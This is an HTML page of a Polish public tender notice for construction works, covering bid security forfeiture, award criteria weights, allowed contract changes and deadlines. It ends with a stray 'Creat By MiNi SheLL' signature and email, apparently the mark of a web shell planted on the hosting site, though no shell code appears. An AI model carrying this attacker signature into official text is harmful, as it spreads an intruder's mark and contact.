10. Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  Wykonawca w  odpowiedzi  na wezwanie,                              o którym  mowa w art.26 ust.3 i ust.3a upzp., z przyczyn leżących po jego stronie, nie złożył oświadczeń lub  dokumentów  potwierdzających okoliczności, których mowa w art.25 ust.1 upzp., oświadczenia, o którym mowa w art. 25a ust.1, pełnomocnictw lub nie wyraził zgody na  poprawienie omyłki, o której mowa w art.87 ust.2 pkt.3 [patrz: punkt X.6 d) ], co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.           

11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
 a)    odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,  
 b)    nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
 c)     zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po  
   stronie wykonawcy.

12.  W zakresie wadium obowiązują uregulowania  zawarte w art.45 i art.46 upzp.



</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1- umowna cena</td><td>60</td></tr><tr><td>2- termin realizacji- za skrócenie terminu o minimum 7 dni (włącznie) tj. do 23.11.br. (włącznie)</td><td>15</td></tr><tr><td>3-  walory ludzi: a) za każde dodatkowe (tj. ponad wymagane warunkiem udziału                         w postępowaniu) 12 miesięcy doświadczenia zawodowego kierownika     budowy, zdobyte na stanowisku kierownika budowy lub kierownika robót     przy realizacji robót budowlanych w branży drogowej                                                                   -  2% = 2,00 pkt, ale max. 6,00 pkt; b) za każdego bezrobotnego skierowanego z Urzędu Pracy i zatrudnionego       w okresie ostatnich 12 miesięcy tj. od października 2015 do               30 września 2016 r., z którym utrzymany jest stosunek pracy co najmniej do dnia upływu terminu składania ofert         -  5% = 5,00pkt, ale max. 15,00 pkt</td><td>21</td></tr><tr><td>3-  kary umowne:za podniesienie kar umownych z tytułu nieterminowej realizacji zamówienia     o minimum 500zł za każdy dzień zwłoki  - 2%= 2,00pkt ,   ale max. 4,00 pkt</td><td>4</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />
1.    Zamawiający przewiduje możliwość zmiany zawartej  umowy w przypadku :

(a)	     zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Rozdz. I IDW,
(b)	     zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy  podwykonawcy lub dalszych   podwykonawców ,  





(c)	     rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia   okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz z jednoczesnym  związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony przed podpisaniem umowy  kosztorys ofertowy, 
(d)	     wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w  trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany                w Dokumentacji projektowej, nie powodujących zmiany umownej ceny, 
(e)	     wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych lub Siły wyższej uniemożliwiających  wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach. W takim przypadku umowny cykl realizacji zamówienia ulega przerwaniu, a jego ponowne wznowienie nastąpi po ustaniu niesprzyjających warunków atmosferycznych lub Siły wyższej.  Wystąpienie takiej okoliczności wymaga formy pisemnej, zaakceptowanej przez Zamawiającego.
(f)	     konieczności wykonania robót budowlanych i/lub robót zabezpieczających będących wynikiem znaleziska                           o znaczeniu historycznym lub archeologicznym, powodujących  uzasadnione, dodatkowe koszty. W takim przypadku umowny cykl realizacji zamówienia  ulega przerwaniu, a jego ponowne wznowienie nastąpi po otrzymaniu zgody Wojewódzkiego Konserwatora Zabytków. 
(g)	      konieczności wykonania robót budowlanych nie objętych zamówieniem podstawowym  w tym szczególnie dokumentacja projektową, których wykonanie jest niezbędne do osiągnięcia końcowego celu przedmiotu zamówienia , a łączna wartość zmian robót budowlanych jest mniejsza od 15 % wartości zamówienia określonej pierwotnie w umowie.  

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/10/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com